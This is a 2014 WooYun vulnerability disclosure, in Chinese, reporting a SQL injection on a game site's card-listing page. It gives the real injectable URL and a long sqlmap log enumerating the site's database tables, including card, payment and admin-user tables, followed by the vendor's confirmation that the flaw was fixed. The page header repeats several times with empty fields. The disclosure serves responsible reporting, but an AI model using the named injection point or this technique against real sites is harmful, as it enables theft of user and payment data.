某大型游戏网站点卡核心SQL注射全库泄露游戏卡号密码泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078618

漏洞标题：某大型游戏网站点卡核心SQL注射全库泄露游戏卡号密码泄露

漏洞作者：路人甲

提交时间：2014-10-09 15:35

修复时间：2014-11-23 15:36

公开时间：2014-11-23 15:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-09：细节已通知厂商并且等待厂商处理中
2014-10-09：厂商已经确认，细节仅向厂商公开
2014-10-19：细节向核心白帽子及相关领域专家公开
2014-10-29：细节向普通白帽子公开
2014-11-08：细节向实习白帽子公开
2014-11-23：细节向公众公开

简要描述：

某大型游戏网站点卡核心sql注射，全库泄露，游戏卡号密码泄露

详细说明：

某大型游戏网站点卡核心sql注射，全库泄露，游戏卡号密码泄露

漏洞证明：

注射地址：

http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9

[13:47:39] [INFO] retrieved: uchome_poke
[13:47:39] [INFO] retrieved: my_2366_com
[13:47:40] [INFO] retrieved: uchome_poll
[13:47:40] [INFO] retrieved: my_2366_com
[13:47:40] [INFO] retrieved: uchome_pollfield
[13:47:41] [INFO] retrieved: my_2366_com
[13:47:41] [INFO] retrieved: uchome_polloption
[13:47:41] [INFO] retrieved: my_2366_com
[13:47:41] [INFO] retrieved: uchome_polluser
[13:47:42] [INFO] retrieved: my_2366_com
[13:47:42] [INFO] retrieved: uchome_post
[13:47:42] [INFO] retrieved: my_2366_com
[13:47:43] [INFO] retrieved: uchome_profield
[13:47:43] [INFO] retrieved: my_2366_com
[13:47:43] [INFO] retrieved: uchome_profilefield
[13:47:44] [INFO] retrieved: my_2366_com
[13:47:44] [INFO] retrieved: uchome_property
[13:47:45] [INFO] retrieved: my_2366_com
[13:47:45] [INFO] retrieved: uchome_property_game
[13:47:45] [INFO] retrieved: my_2366_com
[13:47:47] [INFO] retrieved: uchome_property_value
[13:47:47] [INFO] retrieved: my_2366_com
[13:47:48] [INFO] retrieved: uchome_report
[13:47:48] [INFO] retrieved: my_2366_com
[13:47:49] [INFO] retrieved: uchome_security
[13:47:49] [INFO] retrieved: my_2366_com
[13:47:50] [INFO] retrieved: uchome_session
[13:47:51] [INFO] retrieved: my_2366_com
[13:47:52] [INFO] retrieved: uchome_share
[13:47:53] [INFO] retrieved: my_2366_com
[13:47:53] [INFO] retrieved: uchome_show
[13:47:53] [INFO] retrieved: my_2366_com
[13:47:54] [INFO] retrieved: uchome_space
[13:47:54] [INFO] retrieved: my_2366_com
[13:47:54] [INFO] retrieved: uchome_spacefield
[13:47:54] [INFO] retrieved: my_2366_com
[13:47:55] [INFO] retrieved: uchome_spaceinfo
[13:47:55] [INFO] retrieved: my_2366_com
[13:47:55] [INFO] retrieved: uchome_spacelog
[13:47:56] [INFO] retrieved: my_2366_com
[13:47:56] [INFO] retrieved: uchome_stat
[13:47:56] [INFO] retrieved: my_2366_com
[13:47:57] [INFO] retrieved: uchome_statuser
[13:47:57] [INFO] retrieved: my_2366_com
[13:47:57] [INFO] retrieved: uchome_tag
[13:47:58] [INFO] retrieved: my_2366_com
[13:47:58] [INFO] retrieved: uchome_tagblog
[13:47:58] [INFO] retrieved: my_2366_com
[13:47:59] [INFO] retrieved: uchome_tagspace
[13:48:00] [INFO] retrieved: my_2366_com
[13:48:01] [INFO] retrieved: uchome_task
[13:48:02] [INFO] retrieved: my_2366_com
[13:48:03] [INFO] retrieved: uchome_thread
[13:48:04] [INFO] retrieved: my_2366_com
[13:48:10] [INFO] retrieved: uchome_topic
[13:48:10] [INFO] retrieved: my_2366_com
[13:48:13] [INFO] retrieved: uchome_topicuser
[13:48:16] [INFO] retrieved: my_2366_com
[13:48:16] [INFO] retrieved: uchome_userapp
[13:48:16] [INFO] retrieved: my_2366_com
[13:48:17] [INFO] retrieved: uchome_userappfield
[13:48:17] [INFO] retrieved: my_2366_com
[13:48:17] [INFO] retrieved: uchome_userevent
[13:48:17] [INFO] retrieved: my_2366_com
[13:48:18] [INFO] retrieved: uchome_usergroup
[13:48:18] [INFO] retrieved: my_2366_com
[13:48:18] [INFO] retrieved: uchome_userlog
[13:48:19] [INFO] retrieved: my_2366_com
[13:48:19] [INFO] retrieved: uchome_usermagic
[13:48:19] [INFO] retrieved: my_2366_com
[13:48:19] [INFO] retrieved: uchome_usertask
[13:48:20] [INFO] retrieved: my_2366_com
[13:48:20] [INFO] retrieved: uchome_visitor
[13:48:20] [INFO] retrieved: my_2366_com
[13:48:21] [INFO] retrieved: uchome_wg_2366orders
[13:48:21] [INFO] retrieved: my_2366_com
[13:48:21] [INFO] retrieved: uchome_wg_admin_type
[13:48:22] [INFO] retrieved: my_2366_com
[13:48:22] [INFO] retrieved: uchome_wg_admin_user
[13:48:22] [INFO] retrieved: my_2366_com
[13:48:23] [INFO] retrieved: uchome_wg_bankorders
[13:48:23] [INFO] retrieved: my_2366_com
[13:48:23] [INFO] retrieved: uchome_wg_config
[13:48:23] [INFO] retrieved: my_2366_com
[13:48:24] [INFO] retrieved: uchome_wg_debugmember
[13:48:24] [INFO] retrieved: my_2366_com
[13:48:24] [INFO] retrieved: uchome_wg_game
[13:48:25] [INFO] retrieved: my_2366_com
[13:48:25] [INFO] retrieved: uchome_wg_gamelogin
[13:48:25] [INFO] retrieved: my_2366_com
[13:48:25] [INFO] retrieved: uchome_wg_gameserver
[13:48:26] [INFO] retrieved: my_2366_com
[13:48:26] [INFO] retrieved: uchome_wg_gametype
[13:48:26] [INFO] retrieved: my_2366_com
[13:48:26] [INFO] retrieved: uchome_wg_gameunit
[13:48:27] [INFO] retrieved: my_2366_com
[13:48:27] [INFO] retrieved: uchome_wg_invite
[13:48:28] [INFO] retrieved: my_2366_com
[13:48:28] [INFO] retrieved: uchome_wg_invite_group
[13:48:28] [INFO] retrieved: my_2366_com
[13:48:28] [INFO] retrieved: uchome_wg_invite_ip
[13:48:29] [INFO] retrieved: my_2366_com
[13:48:29] [INFO] retrieved: uchome_wg_invitelogs
[13:48:29] [INFO] retrieved: my_2366_com
[13:48:29] [INFO] retrieved: uchome_wg_kaifu
[13:48:30] [INFO] retrieved: my_2366_com
[13:48:30] [INFO] retrieved: uchome_wg_members_bank
[13:48:30] [INFO] retrieved: my_2366_com
[13:48:31] [INFO] retrieved: uchome_wg_paybank
[13:48:31] [INFO] retrieved: my_2366_com
[13:48:31] [INFO] retrieved: uchome_wg_paylogs
[13:48:32] [INFO] retrieved: my_2366_com
[13:48:32] [INFO] retrieved: uchome_wg_paysys
[13:48:32] [INFO] retrieved: my_2366_com
[13:48:32] [INFO] retrieved: uchome_wg_reggame
[13:48:33] [INFO] retrieved: my_2366_com
[13:48:33] [INFO] retrieved: uchome_wg_regserver
[13:48:33] [INFO] retrieved: my_2366_com
[13:48:33] [INFO] retrieved: uchome_wg_server_state
[13:48:34] [INFO] retrieved: my_2366_com
[13:48:34] [INFO] retrieved: uchome_wg_server_type
[13:48:34] [INFO] retrieved: my_2366_com
[13:48:35] [INFO] retrieved: uchome_wg_statetype
[13:48:35] [INFO] retrieved: my_2366_com
[13:48:35] [INFO] retrieved: uchome_wg_usergame
Database: my_2366_com
[123 tables]
+---------------------------------------+
| cardrungame                           |
| uchome_ad                             |
| uchome_adminsession                   |
| uchome_album                          |
| uchome_appcreditlog                   |
| uchome_artcontent                     |
| uchome_artdiyflag                     |
| uchome_arttype                        |
| uchome_blacklist                      |
| uchome_block                          |
| uchome_blog                           |
| uchome_blogfield                      |
| uchome_cache                          |
| uchome_card_company                   |
| uchome_card_game                      |
| uchome_card_killart                   |
| uchome_card_list                      |
| uchome_card_list1024                  |
| uchome_card_log                       |
| uchome_card_msg                       |
| uchome_card_msgreply                  |
| uchome_class                          |
| uchome_click                          |
| uchome_clickuser                      |
| uchome_comment                        |
| uchome_config                         |
| uchome_creditlog                      |
| uchome_creditrule                     |
| uchome_cron                           |
| uchome_data                           |
| uchome_docomment                      |
| uchome_doing                          |
| uchome_event                          |
| uchome_eventclass                     |
| uchome_eventfield                     |
| uchome_eventinvite                    |
| uchome_eventpic                       |
| uchome_feed                           |
| uchome_friend                         |
| uchome_friendguide                    |
| uchome_friendlog                      |
| uchome_invite                         |
| uchome_log                            |
| uchome_magic                          |
| uchome_magicinlog                     |
| uchome_magicstore                     |
| uchome_magicuselog                    |
| uchome_mailcron                       |
| uchome_mailqueue                      |
| uchome_member                         |
| uchome_mtag                           |
| uchome_mtaginvite                     |
| uchome_myapp                          |
| uchome_myinvite                       |
| uchome_notification                   |
| uchome_pic                            |
| uchome_picfield                       |
| uchome_placecontent                   |
| uchome_placepage                      |
| uchome_placetype                      |
| uchome_poke                           |
| uchome_poll                           |
| uchome_pollfield                      |
| uchome_polloption                     |
| uchome_polluser                       |
| uchome_post                           |
| uchome_profield                       |
| uchome_profilefield                   |
| uchome_property                       |
| uchome_property_game                  |
| uchome_property_value                 |
| uchome_report                         |
| uchome_security                       |
| uchome_session                        |
| uchome_share                          |
| uchome_show                           |
| uchome_space                          |
| uchome_spacefield                     |
| uchome_spaceinfo                      |
| uchome_spacelog                       |
| uchome_stat                           |
| uchome_statuser                       |
| uchome_tag                            |
| uchome_tagblog                        |
| uchome_tagspace                       |
| uchome_task                           |
| uchome_thread                         |
| uchome_topic                          |
| uchome_topicuser                      |
| uchome_userapp                        |
| uchome_userappfield                   |
| uchome_userevent                      |
| uchome_usergroup                      |
| uchome_userlog                        |
| uchome_usermagic                      |
| uchome_usertask                       |
| uchome_visitor                        |
| uchome_wg_2366orders                  |
| uchome_wg_admin_type                  |
| uchome_wg_admin_user                  |
| uchome_wg_bankorders                  |
| uchome_wg_config                      |
| uchome_wg_debugmember                 |
| uchome_wg_game                        |
| uchome_wg_gamelogin                   |
| uchome_wg_gameserver                  |
| uchome_wg_gametype                    |
| uchome_wg_gameunit                    |
| uchome_wg_invite                      |
| uchome_wg_invite_group                |
| uchome_wg_invite_ip                   |
| uchome_wg_invitelogs                  |
| uchome_wg_kaifu                       |
| uchome_wg_members_bank                |
| uchome_wg_paybank                     |
| uchome_wg_paylogs                     |
| uchome_wg_paysys                      |
| uchome_wg_reggame                     |
| uchome_wg_regserver                   |
| uchome_wg_server_state                |
| uchome_wg_server_type                 |
| uchome_wg_statetype                   |
| uchome_wg_usergame                    |
+---------------------------------------+
Current database
[5 tables]
+---------------------------------------+
| None                                  |
| None                                  |
| None                                  |
| None                                  |
| None                                  |
+---------------------------------------+
Database: information_schema
[23 tables]
+---------------------------------------+
| None                                  |
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
+---------------------------------------+
[13:48:35] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 11 times
[13:48:35] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\???
?\SQLMAP~3\Bin\output\ka.2366.com'
[*] shutting down at 13:48:35

修复方案：

紧急修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-10-09 18:16

厂商回复：

已处理，谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078618

漏洞标题：某大型游戏网站点卡核心SQL注射全库泄露游戏卡号密码泄露

相关厂商：2366.com

漏洞作者：路人甲

提交时间：2014-10-09 15:35

修复时间：2014-11-23 15:36

公开时间：2014-11-23 15:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078618

漏洞标题：某大型游戏网站点卡核心SQL注射全库泄露游戏卡号密码泄露

相关厂商：2366.com

漏洞作者： 路人甲

提交时间：2014-10-09 15:35

修复时间：2014-11-23 15:36

公开时间：2014-11-23 15:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-078618"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云